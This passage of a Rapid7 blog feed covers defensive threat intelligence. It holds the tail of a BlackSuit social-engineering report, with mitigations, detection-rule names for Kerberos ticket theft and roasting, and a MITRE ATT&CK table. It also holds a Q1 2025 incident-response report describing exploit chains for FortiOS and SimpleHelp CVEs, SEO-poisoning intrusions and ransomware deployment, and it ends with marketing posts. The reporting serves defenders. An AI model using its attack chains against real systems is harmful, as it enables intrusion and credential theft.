data-sys-asset-uid="bltd7562ba5aa3bcf55" data-sys-asset-filename="figure-27.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-27.png" sys-style-type="display"/><em>Figure 27. 
A listing of the Downloads directory on an asset within the malware developer’s test lab.</em><p>Finally, while setting up the testing environment, the threat actor made changes to several Google Drive files from what appears to be a personal Gmail account: <span data-type='inlineCode'>palomo************[@]gmail[.]com</span>. These changes were visible as numerous versions of the Java RAT were distributed with the threat actor’s test lab Google Drive service account credentials included.</p><h2>Mitigation Guidance</h2><p>Rapid7 recommends taking the following precautions to limit exposure to these types of attacks:</p><ul><li>Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done, for example, by blocking all external domains or by maintaining an allow list or block list of domains. Microsoft Teams allows all external requests by default. For more information, see this reference.</li><li>Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.</li><li>Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests.</li><li>Standardize VPN access. Traffic from known low-cost VPN solutions should be blocked at the firewall level if there is no business use case.</li><li>Require Multi-Factor Authentication (MFA) across the environment. Single-factor authentication facilitates a large number of compromises. For example, if an attacker steals a user’s credentials and acquires the network’s VPN configuration, the absence of MFA on the VPN allows them to easily access the environment.</li><li>Regularly update software and firmware. Ransomware groups like Black Basta are known to purchase exploits for initial access.</li></ul><h2>Rapid7 Customers</h2><p>InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:</p><table><thead><tr><th><p>Detections</p></th></tr></thead><tbody><tr><td><p>Suspicious Chat Request - Potential Social Engineering Attempt</p></td></tr><tr><td><p>Initial Access - Potential Social Engineering Session Initiated Following Chat Request</p></td></tr><tr><td><p>Attacker Technique - Base64 String Added to HKCU Registry Key</p></td></tr><tr><td><p>Suspicious Process - LNK Executes PowerShell via JAR</p></td></tr><tr><td><p>Suspicious Process - QEMU Loads Disk From Staging Directory</p></td></tr><tr><td><p>Credential Access - Steal or Forge Kerberos tickets</p></td></tr><tr><td><p>Anomaly Detection - Failed AS-REP Roasting Attack</p></td></tr><tr><td><p>Non-Approved Application - Remote Management and Monitoring (RMM) Tools</p></td></tr></tbody></table><h2>MITRE ATT&CK Techniques</h2><table><thead><tr><th><p>Tactic</p></th><th><p>Technique</p></th><th><p>Procedure</p></th></tr></thead><tbody><tr><td><p>Reconnaissance</p></td><td><a href="https://attack.mitre.org/techniques/T1591/">T1591: Gather Victim Org Information</a></td><td><p>Operators utilize publicly available information to identify target contact details and financial information.</p></td></tr><tr><td><p>Resource Development</p></td><td><a href="https://attack.mitre.org/techniques/T1587/001/">T1587.001: Develop Capabilities: Malware</a></td><td><p>The threat actors are actively developing new malware to 
distribute.</p></td></tr><tr><td><p>Impact</p></td><td><a href="https://attack.mitre.org/techniques/T1498/">T1498: Network Denial of Service</a></td><td><p>The threat actors overwhelm email protection solutions with spam.</p></td></tr><tr><td><p>Impact</p></td><td><a href="https://attack.mitre.org/techniques/T1486/">T1486: Data Encrypted for Impact</a></td><td><p>The threat actors historically either deploy ransomware after compromising a network, or sell the access to a ransomware group.</p></td></tr><tr><td><p>Initial Access</p></td><td><a href="https://attack.mitre.org/techniques/T1566/004/">T1566.004: Phishing: Spearphishing Voice</a></td><td><p>The threat actors call impacted users and pretend to be a member of the target organization’s IT team to gain remote access.</p></td></tr><tr><td><p>Defense Evasion</p></td><td><a href="https://attack.mitre.org/techniques/T1140/">T1140: Deobfuscate/Decode Files or Information</a></td><td><p>The threat actors decrypt some password-protected zip archive payloads on infected hosts.</p></td></tr><tr><td><p>Defense Evasion</p></td><td><a href="https://attack.mitre.org/techniques/T1055/002/">T1055.002: Process Injection: Portable Executable Injection</a></td><td><p>Some payloads executed by the threat actors utilize local PE injection.</p></td></tr><tr><td><p>Defense Evasion</p></td><td><a href="https://attack.mitre.org/techniques/T1620/">T1620: Reflective Code Loading</a></td><td><p>Some payloads executed by the threat actors load and execute shellcode.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1649/">T1649: Steal or Forge Authentication Certificates</a></td><td><p>The threat actors have abused ADCS services to acquire certificates.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1056/001/">T1056.001: Input Capture: Keylogging</a></td><td><p>The threat actors run an executable that can harvest the user’s 
credentials.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1558/003/">T1558.003: Steal or Forge Kerberos Tickets: Kerberoasting</a></td><td><p>The threat actors have performed Kerberoasting after gaining initial access.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1558/004/">T1558.004: Steal or Forge Kerberos Tickets: AS-REP Roasting</a></td><td><p>The threat actors have performed AS-REP roasting attacks after gaining initial access.</p></td></tr><tr><td><p>Discovery</p></td><td><a href="https://attack.mitre.org/techniques/T1033/">T1033: System Owner/User Discovery</a></td><td><p>The threat actors enumerate asset and user information within the environment after gaining access.</p></td></tr><tr><td><p>Command and Control</p></td><td><a href="https://attack.mitre.org/techniques/T1572/">T1572: Protocol Tunneling</a></td><td><p>The threat actors use SSH reverse tunnels to provide/proxy remote access.</p></td></tr><tr><td><p>Command and Control</p></td><td><a href="https://attack.mitre.org/techniques/T1219/">T1219: Remote Access Software</a></td><td><p>The threat actors have used QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level, and more, to facilitate remote access.</p></td></tr></tbody></table><h2>Indicators of Compromise</h2><p>All indicators of compromise are <a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/blacksuit_socialengineering/2025-06-10_iocs.txt">available at the Rapid7 GitHub repository</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict</link>
      <guid isPermaLink="false">bltc10ce8e9a011b3e9</guid>
      <category><![CDATA[Incident Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Ransomware]]></category>
      <category><![CDATA[Malware]]></category><dc:creator><![CDATA[Tyler McGraw]]></dc:creator>
      <pubDate>Tue, 10 Jun 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Q1 2025 Incident Response Findings]]></title>
      <description><![CDATA[<p>Rapid7’s Q1 2025 incident response data highlights several key initial access vector (IAV) trends, shares salient examples of incidents investigated by the <a href="https://www.rapid7.com/services/incident-response/">Rapid7 Incident Response (IR)</a> team, and digs into threat data by industry as well as some of the more commonly seen pieces of malware appearing in incident logs.</p><p>Is having no MFA solution in place still one of the most appealing vulnerabilities for threat actors? Will you see the same assortment of malware regardless of whether you work in business services or media and communications? And how big a problem could one search engine query possibly be, anyway?<br/><br/>The answer to that last question is “very,” as it turns out. As for the rest…</p><h2>Initial access vectors</h2><p>Below, we highlight the key movers and shakers for IAVs across cases investigated by Rapid7’s IR team. While you’ll notice a fairly even split among several vectors such as exposed remote desktop protocol (RDP) services and SEO poisoning, one in particular is clearly the leader of the pack where compromising organizations is concerned: stolen credentials to valid/active accounts with no <a href="https://www.rapid7.com/fundamentals/multi-factor-authentication-mfa/">multi-factor authentication (MFA)</a> enabled.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6764bbc2b313c30c/6847f53f919439824fb365e6/blog-incidentfindings-1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-1.png" asset-alt="blog-incidentfindings-1.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6764bbc2b313c30c/6847f53f919439824fb365e6/blog-incidentfindings-1.png" data-sys-asset-uid="blt6764bbc2b313c30c" data-sys-asset-filename="blog-incidentfindings-1.png" data-sys-asset-contenttype="image/png" 
data-sys-asset-alt="blog-incidentfindings-1.png" sys-style-type="display"/></p><p>Valid account credentials — with no MFA in place to protect the organization should they be misused — are still far and away the biggest stumbling block for organizations investigated by the Rapid7 IR team, occurring in 56% of all incidents this first quarter.</p><p>Exposed RDP services accounted for 6% of incidents as the IAV, yet they were abused by attackers more generally in 44% of incidents. This tells us that third parties remain an important consideration in an organization’s security hygiene.</p><h2>Valid accounts / no MFA: Top of the class</h2><p>Rapid7 <a href="https://www.rapid7.com/blog/post/2025/04/10/password-spray-attacks-taking-advantage-of-lax-mfa/">regularly bangs the drum</a> for tighter controls where valid accounts and MFA are concerned. As per the key findings, 56% of all incidents in Q1 2025 involved valid accounts / no MFA as the initial access vector. In fact, there’s been very little change since Q3 2024, and as good as no difference between the last two quarters:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4f46e3b26024da70/6847f5814fb4705d9b83c633/blog-incidentfindings-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-2.png" asset-alt="blog-incidentfindings-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4f46e3b26024da70/6847f5814fb4705d9b83c633/blog-incidentfindings-2.png" data-sys-asset-uid="blt4f46e3b26024da70" data-sys-asset-filename="blog-incidentfindings-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-2.png" sys-style-type="display"/></p><h2>Vulnerability exploitation: Cracks in the armor</h2><p>Rapid7’s IR services team observed several vulnerabilities used, or likely to have been used, as an IAV in Q1 2025. 
CVE-2024-55591, for example, the IAV for an incident in manufacturing, is a WebSocket-based race-condition authentication bypass affecting Fortinet's FortiOS and FortiProxy flagship appliances. Successful exploitation results in the ability to execute arbitrary CLI console commands as the super_admin user. The <a href="https://www.fortiguard.com/psirt/FG-IR-24-535">CVE-2024-55591 advisory</a> was published at the beginning of 2025, and it saw widespread exploitation in the wild.<br/><br/>One investigation revealed attackers using the above flaw to exploit vulnerable firewall devices and create local and administrator accounts with legitimate-looking names (e.g., references to “Admin”, “I.T.”, “Support”). This allowed access to firewall dashboards, which may have contained useful information about the devices’ users, configurations, and network traffic. Policies were created that allowed the use of remote VPN services, and the almost month-long dwell time observed in similar incidents may suggest initial access broker (IAB) activity, or a possible intended progression to data exfiltration and ransomware.</p><h2>Exposed RMM tooling: A path to ransomware</h2><p>As noted above, 6% of IAV incidents were a result of exposed remote monitoring and management (RMM) tooling. RMMs, used to remotely manage and access devices, are often used to gain initial access, or form part of the attack chain leading to ransomware.</p><p>One investigation revealed a version of SimpleHelp vulnerable to several critical privilege escalation and remote code execution vulnerabilities, which included CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728.</p><p>These CVEs target the SimpleHelp remote access solution. Exploiting CVE-2024-57727 permits an unauthenticated attacker to leak SimpleHelp "technician" password hashes. If one is cracked, the attacker can log in as a remote-access technician. 
Lastly, the attacker can exploit CVE-2024-57726 and CVE-2024-57728 to elevate to SimpleHelp administrator and trigger remote code execution, respectively. CVE-2024-57727 was <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-57727&amp;field_date_added_wrapper=all&amp;field_cve=&amp;sort_by=field_date_added&amp;items_per_page=20&amp;url=">added to CISA KEV</a> in February 2025.<br/><br/>The vulnerable RMM solution was used to gain initial access and threat actors used PowerShell to create Windows Defender exclusions, with the ultimate goal of deploying INC Ransomware on target systems.</p><h2>SEO poisoning: When a quick search leads to disaster</h2><p>SEO poisoning, once the scourge of search engines everywhere, may not be high on your list of priorities. However, it still has the potential to wreak havoc on a network. Here, the issue isn’t so much rogue entries in regular search results, but instead the paid sponsored ads directly above typical searches. 
Note how many sponsored results sit above the genuine site related to this incident:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ad9e90005e3be26/6847f5c5af1830df2be6dc5c/blog-incidentfindings-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-3.png" asset-alt="blog-incidentfindings-3.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ad9e90005e3be26/6847f5c5af1830df2be6dc5c/blog-incidentfindings-3.png" data-sys-asset-uid="blt1ad9e90005e3be26" data-sys-asset-filename="blog-incidentfindings-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-3.png" sys-style-type="display"/></p><em>Multiple sponsored searches above the official (and desired) search result</em><p>This investigation revealed a tale of two search results, where one led to a genuine download of a tool designed to monitor virtual environments, and the other led to malware. 
When faced with both options, a split-second decision went with the latter and what followed was an escalating series of intrusion, data exfiltration and—eventually—ransomware.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt904bf63c4742561d/6847f5e89224f630c1ea7a52/blog-incidentfindings-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-4.png" asset-alt="blog-incidentfindings-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt904bf63c4742561d/6847f5e89224f630c1ea7a52/blog-incidentfindings-4.png" data-sys-asset-uid="blt904bf63c4742561d" data-sys-asset-filename="blog-incidentfindings-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-4.png" sys-style-type="display"/><em>An imitation website offering malware disguised as genuine software</em><p>On the same day of initial compromise, the attacker moved laterally using compromised credentials via RDP, installing several RMM tools such as AnyDesk and SplashTop. It is likely that the threat actor searched for insecurely stored password files and targeted password managers. They also attempted to modify and/or disable various security tools in order to evade detection, and to create a local account to enable persistence and avoid domain-wide password resets.<br/><br/>An unauthorized version of WinSCP was used to exfiltrate a few hundred GB of sensitive company data from several systems, and with this mission accomplished only a few tasks remained. The first: attempting to inhibit system recovery by tampering with the Volume Shadow Copy Service (VSS), clearing event logs, deleting files, and also attempting to target primary backups for data destruction. 
The second: deployment of Qilin ransomware and a blackmail note instructing the victim to communicate via a Tor link lest the data be published to their leak site.<br/><br/>Qilin ranked 7th in our <a href="https://www.rapid7.com/blog/post/2025/04/08/2025-ransomware-business-as-usual-business-is-booming/">top ransomware groups of Q1 2025</a> for leak post frequency, racking up 111 posts from January through March. Known for double-extortion attacks across healthcare, manufacturing, and financial sectors, Qilin (who, despite their name, are known not to be Chinese speakers, but rather Russian-speaking) has also recently been seen deployed by <a href="https://www.bleepingcomputer.com/news/security/microsoft-north-korean-hackers-now-deploying-qilin-ransomware/">North Korean threat actors Moonstone Sleet</a>.</p><h2>Attacker behavior observations</h2><h3>Bunnies everywhere: Tracking a top malware threat</h3><p>BunnyLoader, the Malware-as-a-Service (MaaS) loader possessing a wealth of capabilities including clipboard and credential theft, keylogging, and the ability to deploy additional malware, is one of the most prolific presences Rapid7 has seen this first quarter of 2025. In many cases, it’s also daisy-chained to many of the <em>other</em> payloads and tactics which make repeated appearances.<br/><br/>To really drive this message home: BunnyLoader is the most observed payload across almost every industry we focused on. Whether we’re talking manufacturing, healthcare, business services or finance, it’s typically well ahead of the rest of the pack. 
Here are our findings across the 5 most targeted industries of Q1:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8b11fdaa0b340c67/6847f6059621d976564d3c6e/blog-incidentfindings-5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-5.png" asset-alt="blog-incidentfindings-5.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8b11fdaa0b340c67/6847f6059621d976564d3c6e/blog-incidentfindings-5.png" data-sys-asset-uid="blt8b11fdaa0b340c67" data-sys-asset-filename="blog-incidentfindings-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-5.png" sys-style-type="display"/></p><p>BunnyLoader is in pole position not only for the 5 industries shown above, but across 12 of 13 industries overall, with 40% of <em>all</em> incidents observed involving this oft-updated malware.</p><p>Just over half of that 40% total involved a fake CAPTCHA (commonly used to trick victims into executing malicious code), with malicious or compromised sites appearing in a quarter of BunnyLoader cases. Rogue documents, which may be booby-trapped with malware or pave the way for potential phishing attacks, bring up the rear at just 9% of all BunnyLoader appearances recorded. First offered for sale in 2023 for a <a href="https://x.com/DailyDarkWeb/status/1699090008827990058">lifetime-use cost of $250</a>, its continued development and large range of features make it an attractive proposition for rogues operating on a budget.</p><h3>Targeted organizations: The manufacturing magnet</h3><p>Manufacturing organizations were targeted in more than 24% of incidents the Rapid7 IR team observed, by far the most targeted industry in Q1 based on both <a href="https://www.rapid7.com/blog/post/2025/04/08/2025-ransomware-business-as-usual-business-is-booming/">Rapid7’s ransomware analytics</a> and IR team observations. 
The chart below compares Rapid7’s industry-wide data (comprising a wide range of payloads and tactics) with ransomware leak-post-specific data. In both cases, manufacturing is a fair way ahead of other industries; this reflects its status as one of the most popular targets for ransomware groups over the last couple of years.</p><p>The manufacturing industry is an attractive target for nation states because it is an important component of global trade. It is also an area with a large amount of legacy operational technology (OT). Combine unpatched legacy systems with complicated supply chains, and you have a risk that nation state actors will find attractive. This is especially the case when considering that many manufacturing organizations have critical contracts with governments, and attacks can cause severe disruption if they're not speedily resolved.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda1d60075c388deb/6847f61eb0379166eb2b5097/blog-incidentfindings-6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-6.png" asset-alt="blog-incidentfindings-6.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda1d60075c388deb/6847f61eb0379166eb2b5097/blog-incidentfindings-6.png" data-sys-asset-uid="bltda1d60075c388deb" data-sys-asset-filename="blog-incidentfindings-6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-6.png" sys-style-type="display"/></p><h2>Conclusion</h2><p>Q1 2025 resembles a refinement of successful tactics, as opposed to brand new innovations brought to the table. 
Our Q1 ransomware analytics showed threat actors making streamlined tweaks to a well-oiled machine, and we find many of the same “evolution, not revolution” patterns occurring here.<br/><br/>This progression is particularly applicable in the case of initial access via valid accounts with no MFA protection. We expect to see no drop in popularity while businesses continue to leave easy inroads open and available to skilled (and unskilled) attackers.<br/><br/>In addition, the risk of severe compromise stemming from seemingly harmless online searches underscores the necessity for organizations to reexamine basic security best practices, alongside deploying robust detection and response capabilities. Businesses addressing these key areas for concern will be better equipped to defend against what should not be an inevitable slide into data exfiltration and malware deployment.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/06/04/rapid7-q1-2025-incident-response-findings</link>
      <guid isPermaLink="false">bltf348c1c0cc36ee71</guid>
      <category><![CDATA[Incident Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Chris Boyd]]></dc:creator>
      <pubDate>Wed, 04 Jun 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb655c1b69f13c73b/6846a711536b63f12ca5f649/incident-response-findings-2025.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Seeing Is Securing: How Surface Command Expands MDR Visibility and Impact]]></title>
      <description><![CDATA[<p>Imagine hiring a professional security team to guard your home — only to discover they’re doing so by monitoring camera feeds from only the front of the house — securing the front door but blissfully unaware of the unlocked window in the back. That’s what many organizations face today when relying on Managed Detection and Response (MDR) services without full visibility across their digital environments.</p><p>Shadow IT, orphaned assets, internet-facing exposures, and unmanaged cloud services are all part of an expanding attack surface. And, according to Enterprise Strategy Group, 76% of organizations have experienced some type of cyberattack involving an unknown or unmanaged internet-facing asset(1) — the kind of risk that stems from gaps in visibility. The result? A critical mismatch between the Attack Surface (what adversaries can reach) and the <a href="https://www.rapid7.com/fundamentals/what-is-the-detection-surface/">Detection Surface</a> (what MDR services are configured to see and respond to).</p><p>To maximize the effectiveness of security operations, MDR must continually evolve. 
Today at Rapid7, that means integrating <a href="https://www.rapid7.com/products/command/attack-surface-management-asm/">Surface Command</a> — not as a dashboard or tool to manage, but as a behind-the-scenes capability that strengthens the service our customers rely on.</p><h2>Extending the detection surface</h2><p>Surface Command enhances the MDR experience by combining two critical perspectives:</p><ol><li>CAASM (<a href="https://www.rapid7.com/fundamentals/what-is-cyber-asset-attack-surface-management-caasm/">Cyber Asset Attack Surface Management</a>) consolidates insights from across internal tooling — vulnerability management platforms, EDR, identity systems, IT service management, firewalls, and more.</li><li>EASM (<a href="https://www.rapid7.com/fundamentals/external-attack-surface-management-easm/">External Attack Surface Management</a>) complements this by continuously scanning for exposed infrastructure: domains, APIs, IPs, ports, and services.</li></ol><p>Together, they offer a complete picture of what’s actually in your environment — and what’s at risk — without requiring additional effort from security teams. For the Rapid7 SOC, this means less risk for blind spots and faster, more confident investigations. For customers, it means fewer RFIs and greater trust in the response process.</p><h2>Bridging the visibility gap</h2><p>Many organizations today rely on spreadsheets and manual processes to keep track of their infrastructure — and the consequences are significant. 
Incomplete inventories, inconsistent classifications, and missed configuration details all contribute to increased risk and slower response.</p><p>Surface Command addresses this with three key strengths:</p><ul><li><strong>Complete inventory</strong>: Using API-based integrations with common security and IT operations tools, Surface Command automatically discovers and classifies a broad set of internal and internet-facing assets — from cloud environments to endpoint platforms, firewall configurations, and vulnerability management tools. This removes the guesswork and closes visibility gaps.</li><li><strong>Continuous insight</strong>: Visibility isn’t a one-time event. Surface Command continuously monitors for new assets and changes to existing ones, ensuring the customer and the SOC always have a current picture of what exists and how it’s exposed.</li><li><strong>Automated efficiency</strong>: By eliminating the need for manual tracking and inventory upkeep, Surface Command frees security teams to focus on higher-value priorities. One customer shared that this capability helped eliminate nearly 100 hours of manual asset tracking per month — time they redirected toward strategic initiatives.</li></ul><p>These operational advantages translate directly into security value: better data, faster detection and investigation, and a more resilient managed defense.</p><h2>Enabling a smarter MDR experience</h2><p>Visibility is a means to an end. 
By enabling Surface Command, the MDR SOC has invaluable insight into every corner of your security environment, bringing efficiencies and deep insights to your managed security program:</p><ul><li><strong>Earlier awareness during onboarding</strong>: Our SOC gets a complete picture of the customer environment right away, which means we can begin protecting it more effectively from day one.</li><li><strong>More context during incidents</strong>: When a detection triggers on a previously unknown asset, the SOC isn’t starting from zero. Surface Command provides the information needed to understand what a system is, who owns it, and how it’s configured.</li><li><strong>Stronger foundation for threat hunting</strong>: For teams that want to lean into proactive defense, Surface Command gives the context needed to ask better questions — and find better answers.</li></ul><p>It also supports compliance initiatives by clarifying what’s in scope and how it’s protected. For organizations pursuing NIST, CIS, or ISO alignment, that transparency can be a game changer.</p><h2>Making Attack Surface Management more accessible than ever</h2><p>Surface Command brings the power of <a href="https://www.rapid7.com/fundamentals/attack-surface-management/">Attack Surface Management</a> — long seen as a capability reserved for mature, well-resourced security teams — directly into the hands of Rapid7 MDR customers. Our goal is to ensure that your internal security team and our SOC are given the most complete context possible from day one.</p><p><strong>There are a number of ways Surface Command is available to MDR customers today. Contact your Rapid7 account team or </strong><a href="https://www.rapid7.com/products/command/attack-surface-management-asm/trial/"><strong>click here</strong></a><strong> to initiate a no commitment trial today.</strong></p><p>(1) Enterprise Strategy Group</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/05/30/seeing-is-securing-how-surface-command-expands-mdr-visibility-and-impact</link>
      <guid isPermaLink="false">blt02a22625fd1d9cb2</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Conner Goldstein]]></dc:creator>
      <pubDate>Fri, 30 May 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30cad4cead79d2d3/6846a7113860835cfa35e65d/surface-command.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Reinforcing resilience with financial assurance: Breach protection matters now more than ever]]></title>
      <description><![CDATA[<h3>Introducing Rapid7’s value-added Breach Protection Warranty that delivers confidence, clarity, and coverage when it matters most.</h3><p>Life’s old adage often applies in security: <em>Hope for the best, prepare for the worst</em>. In today’s threat landscape, even the best-prepared organizations can’t guarantee immunity from cyberattacks. The cost of a breach is no longer just a line item—it’s a business risk with board-level visibility. In 2024, the average total cost of a breach soared to <strong>$4.88 million</strong>, a record high and a 10% increase from the previous year.1</p><p>As threats grow in complexity and breach response becomes more expensive and unpredictable, security leaders aren’t just investing in detection and response—they’re looking for assurance that they are, in fact, prepared for the worst. That’s why Rapid7 is introducing its <strong>Breach Protection Warranty</strong>: real-world financial coverage, built directly into our flagship <a href="/services/managed-detection-and-response-mdr/">Managed Detection and Response (MDR)</a> offering, Managed Threat Complete Ultimate. This coverage is designed to give customers confidence that if that dreaded day comes, they’re ready.</p><p>Rapid7 continues to invest heavily in this industry-leading service—trusted by thousands of customers worldwide—which processes trillions of events and investigates millions of alerts annually. Leveraging this immense scale to ensure robust threat detection and rapid response, the results speak for themselves: 99.6% of our MDR customers remain unaffected by ransomware. 
But beyond numbers, our commitment is clear—we’re dedicated to continuously enhancing MDR capabilities and standing shoulder-to-shoulder with our customers to safeguard their operations.</p><h2>Built-in financial protection, when it counts</h2><p>The Rapid7 Breach Protection Warranty provides up to $1 million in breach-related coverage, based on the size of a customer’s environment. It’s designed to offset the real-world costs organizations face in the wake of a cyberattack, including:</p><ul><li>Forensic investigation expenses</li><li>Legal consultation fees</li><li>Public relations costs</li><li>Post-security incident expenses</li></ul><p>Unlike standalone breach coverage or third-party insurance policies, this warranty comes at no additional cost to eligible customers. There are no upsells or hidden fees—just value-added protection that’s already embedded in the service.</p><h2>Integrated into a world-class detection and response program</h2><p>Rapid7’s holistic and outcome-driven approach to detection and response includes unlimited digital forensics and incident response (DFIR), remote containment, and active remediation of commodity malware. All of these capabilities are amplified by the Rapid7 Command Platform, which seamlessly integrates vulnerability findings and threat intelligence to deliver complete coverage across the entire security incident lifecycle.</p><p>Together with the Breach Protection Warranty, this cohesive model transforms your cybersecurity program into one backed not just by technology and expertise, but also by a financial safety net built into the service.</p><h2>Simplifying breach response, not complicating it</h2><p>A warranty is, at its core, a legal agreement—and it’s understandable that many come with conditions or “strings attached.” Some require customers to exhaust other forms of insurance before coverage kicks in. 
Others recapture the financial benefit through billable incident response services, which can quietly reduce the actual value received.</p><p>Rapid7 takes a different approach. We’ve built the Breach Protection Warranty to maximize customer value with transparency. There are no hidden clauses designed to funnel reimbursement back to us. And because unlimited incident response (IR) is already included in the service, customers don’t need to worry about separate IR contracts or an unexpected changing of the guard in the frenetic aftermath of an incident.</p><h2>Strengthening resilience through readiness</h2><p>While financial protection is the headline, eligibility for the warranty reinforces the fundamentals of a strong security posture. Customers must meet a set of best-practice requirements that align with Rapid7’s proven approach to resilience, including but not limited to:</p><ul><li>Hardened endpoint configurations</li><li>Deployment of core protection modules such as Ransomware Prevention</li><li>Updated, compliant operating systems and software across covered assets</li></ul><p>These aren’t just checkboxes—they’re meaningful controls that improve visibility, reduce risk, and better prepare customers to prevent and respond to threats, with the added benefit of unlocking a meaningful financial backstop.</p><h2>Ready to learn more?</h2><p>This is about more than cost coverage. It’s about trust—trust that your security investments are driving true resilience and that your provider is prepared to stand beside you when it matters most.</p><p>Rapid7’s Breach Protection Warranty is now available to all Managed Threat Complete Ultimate customers. To learn more about your eligibility or sign up, please reach out to your Rapid7 account team.</p><p><em>1 </em><a href="https://www.ibm.com/reports/data-breach"><em>IBM</em></a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/29/reinforcing-resilience-with-financial-assurance-breach-protection-matters-now-more-than-ever</link>
      <guid isPermaLink="false">bltd4ac6f4388938091</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Managed Threat Complete]]></category><dc:creator><![CDATA[Cindy Stanton]]></dc:creator>
      <pubDate>Tue, 29 Apr 2025 12:45:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8ac880c3a8a1c69a/683ddf0b18a5534ca2686f87/gettyimages-2192283021.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Deepening the MDR partnership: Rapid7 now delivers Active Remediation with Velociraptor]]></title>
      <description><![CDATA[<h3>Rapid7 is expanding its response capabilities to meet the demands and relentless pace of today’s threat landscape – and the operational needs of our customers.</h3><p>Partnership means many things to us here at Rapid7. It means showing up with trusted expertise, providing clear guidance in moments of uncertainty, and helping security teams stay ahead of ever-evolving threats. Most of all, we see partnership as foundational to building security resilience – and that requires not only a proactive, risk-aware mindset but also the capability to respond when the inevitable happens.</p><p>As attacks grow faster, more complex, and more persistent, the need for decisive, transparent remediation has become more urgent – some estimates place the average time-to-ransom at just 16.88 hours1 – with that kind of speed, every moment matters. We pride our Managed Detection and Response (MDR) service on delivering best-in-class detection, investigation, and actionable response guidance. Now, we are evolving that partnership – and the strength of your security program – even further.</p><h2>Introducing Active Remediation with Velociraptor</h2><p>Powered by our best-in-class, open-source digital forensics and incident response (DFIR) tool, Rapid7 MDR analysts can take direct, approved remediation actions on your behalf – removing malware, terminating rogue processes, and restoring system integrity while minimizing the need to reimage affected endpoints unless it’s truly required. Every action is executed with precision, transparency, and within clearly defined boundaries.</p><p>This is more than a new capability. It’s a reflection of our commitment to move in lockstep with you – not just at the point of detection, but all the way through to resolution. From unlimited incident response support to deeply collaborative investigations and tailored recommendations, Rapid7 has always prioritized being hands-on when you need us most. 
